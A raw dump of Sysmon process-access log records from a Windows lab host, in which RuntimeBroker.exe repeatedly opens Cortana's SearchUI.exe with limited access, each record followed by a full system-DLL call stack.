13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405484C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012643Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405936C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000012642Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012641Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405544C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012640Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405152C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012639Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405152C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012638Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405544C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012637Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}4540808C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012636Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45406164C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012635Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45406164C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012634Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405980C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012633Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}4540808C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012632Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405380C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012631Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405980C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012630Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405380C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012629Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405660C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012628Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405660C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012627Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405300C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012626Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405152C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012625Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 